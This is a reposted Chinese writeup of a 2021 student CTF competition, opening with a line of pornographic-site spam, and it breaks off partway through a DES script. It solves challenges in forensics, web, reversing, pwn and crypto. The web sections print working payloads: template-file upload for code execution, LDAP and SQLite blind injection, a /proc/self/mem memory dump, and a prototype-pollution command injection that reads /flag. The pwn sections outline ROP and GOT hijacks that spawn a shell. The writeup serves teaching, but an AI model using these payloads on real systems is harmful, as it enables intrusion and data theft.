日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

2021年第一届 “东软杯”网络安全CTF竞赛官方WriteUp(转)

發(fā)布時(shí)間:2023/12/15 综合教程 46 生活家
生活随笔 收集整理的這篇文章主要介紹了 2021年第一届 “东软杯”网络安全CTF竞赛官方WriteUp(转) 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

MISC

1 簽到

難度 簽到
復(fù)制給出的flag輸入即可

2 range_download

難度 中等
flag{6095B134-5437-4B21-BE52-EDC46A276297}

0x01

分析dns流量,發(fā)現(xiàn)dns && ip.addr=1.1.1.1存在dns隧道數(shù)據(jù),整理后得到base64:
cGFzc3dvcmQ6IG5zc195eWRzIQ==
解base64得到:
password: nss_yyds!

0x02

分析http流量,發(fā)現(xiàn)ip.addr==172.21.249.233存在http分段下載數(shù)據(jù),每次按照請(qǐng)求頭range要求只下載一個(gè)字節(jié)。由于是random下載,所以需要按順序整理,整理后可以得到一個(gè)加密的壓縮包。
在整理過程中會(huì)發(fā)現(xiàn)缺失2349位字節(jié),需要嘗試對(duì)其進(jìn)行修復(fù)。
由于0x01中,我們得到了zip的密碼,所以可以對(duì)該字節(jié)進(jìn)行爆破,如果密碼正確,則修復(fù)成功。

0x03

解開壓縮包得到二維碼,
掃描后得到:

5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555570706344686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3d

ciphey分析得到flag:

ciphey "5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555570706344686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3d" Possible plaintext: '5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786 a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555 570706344686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316 c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3d' (y/N): Possible plaintext: '5133687161454v534v6y394w4w325z7854475233566v6870626z42554v6z5z4z5645466x4v47786 z62324v464w47705557464635546w6x536148565165564659645563774v327073515863324u5846555247314555564134555 570706344686957444w336544684x596x4255556v6333636v687165486x756446413351577470566v4242526y6x4z5457316 x515452754w555661636v4z7859556430566x4w3559557844656z4z35626x68334w6w5z4x51513w3w' (y/N): Possible plaintext: 'w3w31515x4z5w6w43386x62653z4z6564487559553w4x6650346559587z4v636166555w45725451 5x6137545z4x6y6252424v665074775153314644657x684561786v6363336v6555524x695x486445633w4447596864436070 755554314655554137425556485u423368515370723v477365546956465561565841635x6w64553646475550774w464v4232 6z68774v4x6645465z4z5z6v45524z6260786v6653325744587z523w4w493y6v435v4541617863315' (y/N): Possible plaintext: 'd3d31515c4a5d6d43386c62653a4a6564487559553d4c6650346559587a4e636166555d45725451 5c6137545a4c6b6252424e665074775153314644657c684561786e6363336e6555524c695c486445633d4447596864436070 755554314655554137425556485f423368515370723e477365546956465561565841635c6d64553646475550774d464e4232 6a68774e4c6645465a4a5a6e45524a6260786e6653325744587a523d4d493b6e435e4541617863315' (y/N): Possible plaintext: 'flag{6095B134-5437-4B21-BE52-EDC46A276297}' (y/N): y ╭────────────────────────────────────────────────────────────────╮
│ The plaintext is a Capture The Flag (CTF) Flag                 │ 
│ Formats used:                                                  │ 
│    hexadecimal                                                 │ 
│    base64                                                      │ 
│    utf8                                                        │ 
│    base62                                                      │
│    base58_bitcoin                                              │
│    base32                                                      │
│    utf8Plaintext: "flag{6095B134-5437-4B21-BE52-EDC46A276297}" │ ╰────────────────────────────────────────────────────────────────╯

0x04

題目流量生成腳本:

import os
import time
import requests
import random

for i in "cG Fz c3 dv cm Q6 IG 5z c1 95 eW Rz IQ ==".split(" "):
    os.system("nslookup " + i+".nss.neusoft.edu.cn 1.1.1.1")

time.sleep(5)

l = int(requests.head("http://172.21.249.233/flag.7z", stream=True).headers["Content-Length"])
a = set()
while len(a) != l:
    b = random.randint(0, l)
    r = requests.get("http://172.21.249.233/flag.7z", stream=True, headers={"Range": "bytes=" + str(b) + "-" + str(b)})
    if r.status_code == 416:
        print(b)
    a.add(b)
    print(len(a))

3 只是個(gè)PNG,別想太多了.png

難度 簽到
flag:flag{zhe_ti_mu_ye_tai_bt_le_XD}
本題考察的是對(duì)PNG結(jié)構(gòu)以及常見工具的使用。
題目只是在IDAT數(shù)據(jù)當(dāng)中存儲(chǔ)了多余的zlib數(shù)據(jù)流,通過binwalk可以直接進(jìn)行解壓縮。
binwalk -Me PNG.png

4 png被打得很慘,現(xiàn)在卷土從來

難度 難
flag:
flag{zheshirenchude}
本題考察的是對(duì)PNG結(jié)構(gòu)以及常見出題點(diǎn)的了解程度
打開題目是PNG圖片,binwalk無異常

010editor打開發(fā)現(xiàn)crc異常,結(jié)構(gòu)暫時(shí)沒啥問題。

tweakpng打開發(fā)現(xiàn),IHDR,IDAT,IEND數(shù)據(jù)塊的CRC值均不對(duì)。



之后用StegSolve查看,發(fā)現(xiàn)圖片有隱藏的框。框選出了IDAT data,說明IDAT數(shù)據(jù)應(yīng)該有特殊之處需要查看。

圖片本身的信息就這么多,從PNG結(jié)構(gòu)來一點(diǎn)點(diǎn)看,首先IHDR區(qū)塊CRC有問題,一般說明是圖片高度被修改,通過CRC反計(jì)算腳本(或者直接修改高度值盲試)發(fā)現(xiàn)圖片下面有隱藏圖像。stegSolve查看,發(fā)現(xiàn)有隱藏圖案


三個(gè)框分別圈出了png圖片的一些數(shù)據(jù)結(jié)構(gòu),第二個(gè)框顯示png圖像數(shù)據(jù)使用zlib方式壓縮。框選此處說明需要注意zlib壓縮數(shù)據(jù)。
第三個(gè)框是具體壓縮塊數(shù)據(jù)結(jié)構(gòu)。此圖片內(nèi)容為libpng官網(wǎng)文檔截圖,但是實(shí)際訪問官網(wǎng),可發(fā)現(xiàn)標(biāo)注的壓縮塊結(jié)構(gòu)標(biāo)注并不符合。

數(shù)字被故意修改過,所以可知2233這串?dāng)?shù)字應(yīng)該為題目的某個(gè)key或者h(yuǎn)int。
之后所有的IDAT數(shù)據(jù)塊CRC值均不正確。將所有CRC值拷貝下來。hex解碼。發(fā)現(xiàn)是hint
hintis[IEND_and_11]_jiayou_XD.

根據(jù)hint查看IEND,正常IEND數(shù)據(jù)應(yīng)為空,僅作為文件結(jié)束標(biāo)志。但是現(xiàn)在卻有數(shù)據(jù)。

提取數(shù)據(jù),發(fā)現(xiàn)前四位為9C 78,而zlib數(shù)據(jù)頭為78 9C。修改前四位進(jìn)行解壓。發(fā)現(xiàn)是base64,之后進(jìn)行解碼。最后得出flag第一段
flag{zheshi

得到第一段之后,hint里面的11,還沒有解決。通過查看發(fā)現(xiàn)chunk 11,是最后一個(gè)IDAT數(shù)據(jù)塊。根據(jù)之前還有一個(gè)hint 2233,全數(shù)據(jù)塊搜索2233。發(fā)現(xiàn)數(shù)據(jù)塊末尾含有2233,僅此一個(gè)

根據(jù)前一段flag,猜測(cè)此處也是zlib壓縮,將從2233開頭到CRC值之前的32個(gè)HEX值復(fù)制,修改2233為zlib數(shù)據(jù)頭78 9C
發(fā)現(xiàn)解碼完數(shù)據(jù)為一種編碼,根據(jù)前一段flag來猜測(cè),此處應(yīng)該是其他base家族類的編碼。通過basecrack或者在線base解碼,可得知此為base91,解碼為renchude}
后一段flag為:renchude}



合并兩段,得到最終flag
flag{zheshirenchude}

5 在哪呢

難度 簡(jiǎn)單
查看PDF
在文字中發(fā)現(xiàn)多處顏色越來越淡的提示

想到flag可能被以白色隱藏到文字中,全選文字
發(fā)現(xiàn)倒數(shù)第二段段尾有一段空白字

復(fù)制出來或編輯為其它顏色
得到flag
flag{hey_there_is_no_thing}

6 ecryptedzip

難度:難
本題考察的是對(duì)明文攻擊的實(shí)戰(zhàn)應(yīng)用 在實(shí)際環(huán)境中不會(huì)主動(dòng)提供明文文件用于明文攻擊 需要自己尋找明文文件或部分明文進(jìn)行攻擊
壓縮包內(nèi)含有兩個(gè)文件LICENSE和README.md
LICENSE為開源證書文件
將常?開源協(xié)議全下載下來 對(duì)比大小
發(fā)現(xiàn)Apache 2.0大小極為相近
使用github 內(nèi)置的LICENSE文件可以成功解密
還有一種簡(jiǎn)單的方法 開源許可證很多都是空格開頭 可以直接使用多個(gè)重復(fù)空格作為明文

7 easysteg

難度 簡(jiǎn)單

可以看到一個(gè)缺少定位符的二維碼,補(bǔ)全后拿到提示:一種常見的隱寫
分離圖片拿到壓縮包
解壓后配合觀察圖片名稱格式,使用stegpy拿到flag
flag{Do_U_Kn0w_Ste9py??}

8 壓縮包壓縮包壓縮包

難度 簡(jiǎn)單
第一層為50996.zip
寫腳本解密遞歸壓縮包 300層

解題腳本

mkdir zips
mkdir zips/files
mv 50996.zip ./zips
cd zips

while :
do  
    file=$(ls -t | tail -1)
    pass=$(zipinfo $file | grep - | cut -d ' ' -f12 | cut -d . -f1)
    unzip -P $pass $file
    echo "unzip -P $pass $file"
    mv $file ./files
done

最后一層為23333.zip 6位數(shù)字密碼為756698
打開sqlite在employees表中找到flag
flag{Unz1p_i5_So_C00l##}

WEB

9 flag

難度 中等

解法一

人肉排序,然后口算base64

解法二

等網(wǎng)站輸出足夠多,復(fù)制下來,然后利用大部分文本編輯器都支持的查找/替換功能將消息替換成類似如下的格式。

a = list("a" * 20)
...
a[1]="a"
a[20]="b"
a[3]="c"
...
# 最后
import base64
print(base64.b64decode(''.join(a)))

解法三

題目SSE實(shí)時(shí)推送消息至瀏覽器,路由為'/flag',可以直接:

import base64
from sseclient import SSEClient

flag = ""
for msg in SSEClient('http://127.0.0.1/flag'):
    msg = (str(msg).split(","))
    msg[1] = str(msg[1]).replace("叉(小寫)", "x").replace("叉(大寫)", "X")
    if flag == "":
        flag = list("?" * int(msg[0][2:-1])
)
    if "?" not in "".join(flag):
        break
    flag[int(msg[1][1:-3])] = msg[1][-1]
print(base64.b64decode("".join(flag)))

等著輸出就行了

Tips

題目根據(jù)瀏覽器是否成功加載http://burp/favicon.ico圖片來判斷選手是否開啟了BurpSuite。如果開啟則會(huì)跳轉(zhuǎn)至/Index,而正確的路由是/lndex。
如果被檢測(cè)到BurpSuite,會(huì)記錄在session中,需要清空一下瀏覽器cookie再試。

10 odd_upload

本題考察的是新生對(duì)模板引擎的認(rèn)識(shí).
難度:中等

通過頁面提示.很容易發(fā)現(xiàn)題目使用了smarty模板引擎的demo項(xiàng)目

題目提供了一個(gè)上傳點(diǎn). 后端使用了嚴(yán)格的后綴黑名單防止上傳php或Apache配置文件.
可通過覆蓋模板文件.tpl 控制模板內(nèi)容

POST /? HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------43155698238817916993932117986
Content-Length: 365
Origin: http://
DNT: 1
Connection: close
Referer: http://
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

-----------------------------43155698238817916993932117986
Content-Disposition: form-data; name="file"; filename="header.tpl"
Content-Type: application/octet-stream

{phpinfo()}

-----------------------------43155698238817916993932117986
Content-Disposition: form-data; name="path"

templates/
-----------------------------43155698238817916993932117986--

再次訪問首頁 之前修改的模板被渲染 執(zhí)行phpinfo函數(shù) 拿到環(huán)境變量中的flag

11 Easyinject

本題考察的是Ldap注入
難度:簡(jiǎn)單
首先通過頁面注釋賬號(hào)登陸 發(fā)現(xiàn)提示 flag是在目錄里面的某一個(gè)用戶的郵箱屬性
通過關(guān)鍵詞“目錄“ “屬性”可判斷出題目使用了ldap 或在fuzz時(shí)頁面報(bào)錯(cuò)也可以判斷出使用了ldap
這時(shí)可以使用通配符*猜測(cè)郵箱

L*
Ld*
Lda*

這里注意有重疊的字符串需要額外做處理
Ps 在讀提交上來的wp時(shí)發(fā)現(xiàn)很多同學(xué)都是先跑出用戶在跑郵箱 并且猜測(cè)出了原過濾器還構(gòu)造了復(fù)雜的playload. 其實(shí)可以直接跑郵箱地址不用構(gòu)造用戶查詢. 原本設(shè)計(jì)的是跑出ldap密碼的題目. 比賽前覺得難度可能有點(diǎn)高不適合新生. 在收集的wp中居然有大佬跑出了原先設(shè)計(jì)的ldap密碼. dltql

12 Hideandseek

難度:難
題目提示1: 要怎樣才能讀到內(nèi)存里面的flag呢?
題目提示2: linuxの奇妙文件系統(tǒng)

<?php 
highlight_file(__FILE__); 
//docker  
//FROM php:8.1.0 
//disable_functions=exec,shell_exec,system,passthru,popen,proc_open,putenv,getenv,pcntl_exec,fputs,fwrite,pcntl_fork,pcntl_waitpid,pcntl_setpriority,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_sigprocmask 
//disable_classes = FFI 
//chmod -R  0555 html/ 
//php -S 0.0.0.0:8000 

function main(){ 
$flag=file_get_contents('/flag');//看到這個(gè)flag了嗎 (°▽°)ノ? 
if($flag==''){ 
die('看來你失敗了'); 
} 
file_put_contents('/flag','');//我把它覆蓋了都不給你 ( ̄▽ ̄) 
test(); 
} 
function test(){ 
eval($_REQUEST['eval']);//來試試讀flag吧 只有一次機(jī)會(huì)哦 執(zhí)行結(jié)束flag真的會(huì)消失的說 重啟容器間隔會(huì)很長(zhǎng)時(shí)間呢 本地試好了再來試試吧 (? ̄△ ̄)?  
} 
if(isset($_REQUEST["eval"])){ 
main(); 
} 
?>

本題需要完成讀取php進(jìn)程內(nèi)存操作
分析代碼: 讀取flag文件賦給$flag局部變量,目標(biāo)是讀取這個(gè)$flag變量的內(nèi)容
但是走到test函數(shù)時(shí)不能讀到其他函數(shù)的局部變量
只能通過讀取內(nèi)存獲得flag.
這時(shí)可利用linux虛擬文件系統(tǒng)的特性讀取內(nèi)存
讀取 /proc/self/maps 獲取 進(jìn)程自身內(nèi)存布局

使用獲取到的布局信息讀取自身內(nèi)存
/proc/self/mem (需要給出正確的偏移量才能成功讀取)

?eval=$maps = file_get_contents('/proc/self/maps');$handle=fopen('/proc/self/mem','r');$r=explode(PHP_EOL,$maps);var_dump(explode('-',$r[7])[0]);fseek($handle,hexdec(explode('-',$r[7])[0]));echo fread($handle,10000000);

在dump出的內(nèi)存尋找flag{字符串 即可獲得flag

13 dirtyrce

難度:難

var express = require('express');
var nodeCmd = require('node-cmd');
var bodyParser = require('body-parser');
const app = express();
var router = express.Router();
const port = 80;
app.use(bodyParser.urlencoded({
    extended: true
})).use(bodyParser.json());
function isValidIP(ip) {
    var reg = /^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])$/;
    return reg.test(ip);
}
app.post("/ping",
function(req, res, next) {

    b = req.body.cmd;
    if (req.body.ping === undefined) {
        res.send('invalid parm');
        return;
    }
    ping = req.body.ping
    if (ping.time !== undefined) {
        time = Number(ping.time);
        if (time > 10 || time < 1) {
            res.send('invalid time');
            return;
        }
        if (Object.keys(ping).length != 1 && ping.ip !== undefined && ping.ip != '') {
            if (!isValidIP(ping.ip)) {
                res.send('invalid ip addr');
                return;
            }
        }
    } else {
        res.send('need time parm');
        return;
    }
    ip = ((ping.ip !== undefined && ping.ip != '') ? ping.ip: '114.114.114.114');
    nodeCmd.run('ping -c ' + time + ' ' + ip, //WINDOWS USE -n
    function(err, data, stderr) {
        res.send(data);
        return;
    });

});
app.get('/',
function(req, res, next) {
    res.redirect('index');
});

app.get('/index',
function(req, res, next) {
    res.send('<title>ping test</title><form action="/ping" method="POST">Ip:<input type="text" name="ping[ip]"" placeholder="default value 114 dns"><br>Times:<input type="text" name="ping[time]"  value="1"><input type="submit" value="Ping !"></form> ');
});
app.listen(port);

/ping 路由內(nèi)有命令執(zhí)行操作 但是ip經(jīng)過嚴(yán)格的正則校驗(yàn) 無法繞過,time也有強(qiáng)制類型轉(zhuǎn)換.
只能想辦法繞過這個(gè)校驗(yàn).
通讀代碼發(fā)現(xiàn)當(dāng)輸入?yún)?shù)數(shù)量為1且參數(shù)為time時(shí)不會(huì)校驗(yàn)flag內(nèi)容.
在后續(xù)還會(huì)使用三元運(yùn)算符判斷ip是否為空.
構(gòu)造原型污染 污染ping數(shù)組的原型 即可完成以上條件 達(dá)到命令執(zhí)行的效果.

ping[__proto__][ip]=|cat /flag&ping[time]=10

14 wschat

一個(gè) nodejs+sqllite寫的輕量聊天室
難度:?
本題考察特殊sql注入點(diǎn)的利用
現(xiàn)在使用ws協(xié)議的網(wǎng)站越來越多 (出題時(shí)我就想到了為什么不出一道題目來學(xué)學(xué)ws注入)
題目也使用了protobuf這是一種像json的結(jié)構(gòu)化數(shù)據(jù),在現(xiàn)在的httprpc中也非常常見.
該題前后端交互使用了socket.io,通信使用protobuf做結(jié)構(gòu)化數(shù)據(jù).
前端代碼做了輕度混淆,并且具有反調(diào)試功能.
閱讀前端代碼發(fā)現(xiàn),用戶輸入存在正則校驗(yàn).
開始解題
去除反調(diào)試和正則校驗(yàn)(修改js)
手動(dòng)測(cè)試發(fā)現(xiàn)注入點(diǎn)

登陸處存在注入
猜測(cè)語句為select xx from xx where xx='username'
注冊(cè)一個(gè)賬號(hào)adad 使用布爾注入
sqlite的布爾盲注方法

判斷表數(shù)量
adad' and (select count(*) from sqlite_master where type='table')=5  -- 
表名
and substr((select name from sqlite_master where type='table' limit 0,1),1,1)='T'
列名
and substr((SELECT sql FROM sqlite_master where name='user_table'),33,1)='I'
記錄
and substr((SELECT f16g FROM f16g_1s_1n_th1s_table),1,1)='f'

本題有兩種解題方法
第一種方法
編寫js腳本在瀏覽器運(yùn)行 進(jìn)行注入.
第二種方法非常復(fù)雜 脫離瀏覽器編寫腳本直接與ws后端通信.
可惜在比賽結(jié)束前沒有隊(duì)伍解出這道題.但是在結(jié)束后or4nge團(tuán)隊(duì)提交了這道題目的wp 且使用了第二種方法.完美地完成了該題. 大家有興趣可以看看or4nge戰(zhàn)隊(duì)大佬的題解
(https://or4ngesec.github.io/post/dnuictf-writeup-by-or4nge/)

RE

15 signin

直接查看字符串表即可獲得flag

16 happyCTF

這道題是用c++寫的,其實(shí)代碼核心很簡(jiǎn)單就只是單字節(jié)異或,所以把密文當(dāng)成明文輸入就能得到flag,只是驗(yàn)證的過程稍微麻煩,是一個(gè)遞歸驗(yàn)證的算法,不過沒什么用換成strcmp效果是一樣的,只是起到一個(gè)迷惑的作用,原始代碼很簡(jiǎn)單,但是開啟代碼優(yōu)化以后再用ida反編譯看起來就很亂了,這也是起到迷惑作用。加密的核心部分是用lambda匿名函數(shù)實(shí)現(xiàn)的起到一個(gè)加密代碼隱藏的作用,防止這個(gè)最簡(jiǎn)單的加密被直接找到,所以下一次試試把密文當(dāng)成flag輸入,說不定有驚喜

17 Remember Crypt 4

如果對(duì)ctf常用的加密算法熟悉的話,看到ida的反匯編會(huì)很眼熟,這是一道很簡(jiǎn)單的rc4加密,該算法的特點(diǎn)是它可以自定義密碼表,所以可以起到一點(diǎn)迷惑作用,但是沒什么用,rc4是對(duì)稱加密,所以只需把密文當(dāng)成明文重新加密一邊就能得到明文,所以碰到一些加密算法可以試試這個(gè)辦法,萬一是對(duì)稱加密呢,直接就出flag了
貼一份rc4的代碼

void rc4_init(unsigned char*s,unsigned char*key,unsigned long len)//s最開始是傳入的長(zhǎng)度為256的char型空數(shù)組,用來存放初始化后的s
//key是密鑰,內(nèi)容可定義  //最后一個(gè)len是密鑰的長(zhǎng)度
{
 int i=0;
 int j=0;
 unsigned char k[256]={};
 unsigned char temp = 0;
 for(i=0;i<256;i++)
 {
  s[i]=i;         //0-255賦給s
  k[i]=key[i%len];   //將k重新計(jì)算
 }
 for(i=0;i<256;i++)
 {
  j=(j+s[i]+k[i])%256;    //給j賦
  temp=s[i];
  s[i]=s[j];
  s[j]=temp;    //s[i]和s[j]交換
 }
}

18 EasyRe

題目是基于Linux Signal機(jī)制的VM題目,parent進(jìn)程和child進(jìn)程間通過signal通信,執(zhí)行opcode,調(diào)試難度比較高。并且signal的注冊(cè)在main函數(shù)之前。
具體解法可以參照or4nge戰(zhàn)隊(duì)以及chamd5團(tuán)隊(duì)給出的wp
(https://or4ngesec.github.io/post/dnuictf-writeup-by-or4nge/)
(https://mp.weixin.qq.com/s/KgxHOFH52EE8z7NnMTSIDA)

PWN

19 NssShop

難度:簽到題
真 簽到題 不會(huì)PWN的同學(xué)也可以來試試
一道非常簡(jiǎn)單的整數(shù)溢出題

在計(jì)算總價(jià)格時(shí)會(huì)發(fā)生溢出
達(dá)成0元購(x)

20 justdoit

把軟件載入ida看一看反編譯,很普通,發(fā)現(xiàn)主函數(shù)調(diào)用了read(),然后又調(diào)用了這個(gè)read_long(),看一眼內(nèi)容

沒什么奇怪的地方,看看反匯編

發(fā)現(xiàn)了奇怪的指令,add rbp,rax,而rax是上面read_long中atoi的輸出,所以我們可以控制一下rbp的值
題目很簡(jiǎn)單,沒有pie所以可以用rop,沒有canary所以可以用bof,也可以部分劫持got表,也給了libc,我們可以用puts_plt 來泄漏 libc 的地址,通過一些調(diào)試之后,發(fā)現(xiàn)可以在payload中再次調(diào)用main函數(shù)來控制4個(gè)塊的payload

在堆棧里,我們將main地址推送到 0x7fffffffde70 并添加 rbp 到達(dá) 0x7fffffffde68 的ip

然后當(dāng)程序調(diào)用 leave,ret 時(shí),rbp 會(huì)被設(shè)置為 = 0x00000a3131313131。
現(xiàn)在的 rsp 是 0x7ffffffffde78,但是在返回到 main 函數(shù)之后,有這兩條指令
push rbp

mov rbp, rsp

看上面的堆棧圖,紅色塊是前三個(gè)read_long()塊里面的第二個(gè),這個(gè)塊我們可以放任意內(nèi)容(塊3需要放main地址,塊1放string控制rbp),然后用payload pop_rdi, address, puts, ret去泄露libc,然后返回main函數(shù)重用漏洞。
所以現(xiàn)在只需要放入payload pop_rdi、/bin/sh、system 然后控制 rbp 即可獲得 shell。

21 reallNeedGoodLuck

這個(gè)題就比較有意思了,在IDA可以看到代碼很簡(jiǎn)單,代碼內(nèi)容就是可以讓你在任意地址寫入4個(gè)字節(jié),軟件也沒有pie所以地址都是固定的,也可以劫持got表。
首先,把exit GOT改成main,這樣我們就有了main函數(shù)的無限循環(huán)。然后我們可以根據(jù)需要覆蓋任意多次。
題目的一種比較明顯的解法是把a(bǔ)toi函數(shù)更改為system,然后將字符串“/bin/sh”放入nptr變量中,然后在調(diào)用atoi("/bin/sh")時(shí),程序?qū)?zhí)行system(" /bin /sh"),然后get shell
所以問題就是如何替換到正確的地址,因?yàn)閍toi已經(jīng)調(diào)用過,所以got表中有其libc地址,所以通過用system
函數(shù)地址的最后三個(gè)字節(jié)覆蓋原始地址的最后三個(gè)字節(jié)即可,需要一些好運(yùn)

22 iterator

在處理迭代器時(shí),沒有合理的判斷迭代器范圍,導(dǎo)致了指針越界。合理布局內(nèi)存可以覆寫Vector的結(jié)構(gòu)體,執(zhí)行任意內(nèi)存讀寫,最終劫持Got表。
此處可以參考地運(yùn)團(tuán)隊(duì)dalao的wp:
https://mp.weixin.qq.com/s/C0Vn_5NnGCd8Sn6--otsgA

CRYPTO

23 EzDES

一輪des沒有多輪s盒干擾,所以該題難度是對(duì)des加密流程和算法的了解,可以通過窮舉密鑰和差分分析等方法實(shí)現(xiàn),該腳本主要的思想是將明文加密到一半得到s盒置換前的數(shù)據(jù),將密文解密到一半得到s盒置換后的數(shù)據(jù),異或這兩組數(shù)據(jù)可得可能的des密鑰,然后將可能的des密鑰存儲(chǔ)到數(shù)組中,比對(duì)3組明密文,即可得出密鑰。多輪的des加密差分分析思想也是同理,通過多組明密文得出密鑰的可能性,選擇最大可能性的密鑰。

# -*- coding: UTF-8 -*-
# Plaintext = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'A', 'B', 'C', 'D', 'E', 'F']
def twoto16(new_p_box_list):
    str = []
    for i in range(8):
        sum = new_p_box_list[i][0] * 2**3 + new_p_box_list[i][1] * 2**2 + new_p_box_list[i][2] * 2**1 + new_p_box_list[i][3] * 2**0
        #print(sum)
        str.append(hex(sum))
    return str
# 進(jìn)制轉(zhuǎn)換 十六進(jìn)制轉(zhuǎn)換二進(jìn)制以及二進(jìn)制轉(zhuǎn)換為十六進(jìn)制數(shù)
def hex_to_binary(str):
    initialplaintext = []
    initialresult = bin(int(str,16))[2:]
    initialresult = initialresult.zfill(len(str)*4)
    for i in range(len(initialresult)):
            initialplaintext.append(initialresult[i])
    return initialplaintext

def binary_to_hexadecimal(bin_list):
    bin_str = ''.join(bin_list)
    hstr = hex(int(bin_str, 2))[2:].upper()
    l = len(bin_str) // 4
    for i in range(l - len(hstr)):
        hstr = "0" + hstr
    return hstr

#初始置換IP
_ip = [57,49,41,33,25,17,9,1,
       59,51,43,35,27,19,11,3,
       61,53,45,37,29,21,13,5,
       63,55,47,39,31,23,15,7,
       56,48,40,32,24,16,8,0,
       58,50,42,34,26,18,10,2,
       60,52,44,36,28,20,12,4,
       62,54,46,38,30,22,14,6
       ]

def substitution(table):
    result_table = [0]*64
    for i in range(64) :
        result_table[i] = table[_ip[i]]
    return  result_table

#初始逆置換IP
_fp = [39,7,47,15,55,23,63,31,
       38,6,46,14,54,22,62,30,
       37,5,45,13,53,21,61,29,
       36,4,44,12,52,20,60,28,
       35,3,43,11,51,19,59,27,
       34,2,42,10,50,18,58,26,
       33,1,41,9,49,17,57,25,
       32,0,40,8,48,16,56,24
       ]
_fp2 = [57,49,41,33,25,17,9,1,
        59,51,43,35,27,19,11,3,
        61,53,45,37,29,21,13,5,
        63,55,47,39,31,23,15,7,
        56,48,40,32,24,16,8,0,
        58,50,42,34,26,18,10,2,
        60,52,44,36,28,20,12,4,
        62,54,46,38,30,22,14,6,
        ]

def inverse_substitution(table) :
    result_table = [0] *64
    for i in range(64) :
        result_table[i] = table[_fp[i]]
    return result_table
def reverse_substitution(table):
    result_table = [0]*64
    for i in range(64):
        result_table[i] = table[_fp2[i]]
    return result_table

#擴(kuò)展置換
_extend_table = [
                31,0,1,2,3,4,
                3,4,5,6,7,8,
                7,8,9,10,11,12,
                11,12,13,14,15,16,
                15,16,17,18,19,20,
                19,20,21,22,23,24,
                23,24,25,26,27,28,
                27,28,29,30,31,0
                ]
def extend_replacement(Right_table) :
    extend_list = [0] * 48
    for i in range(48):
        extend_list[i] = Right_table[_extend_table[i]]
    return extend_list

#與子密鑰異或
def xor(lits,Key):
    result = []
    for i in range(len(lits)):
        result.append(int(lits[i]) ^ int(Key[i]))
    return result

#S盒替換
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
      0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
      4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
      15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
      3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
      0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
      13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
      13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
      13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
      1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
      13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
      10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
      3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
      14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
      4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
      11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
      10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
      9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
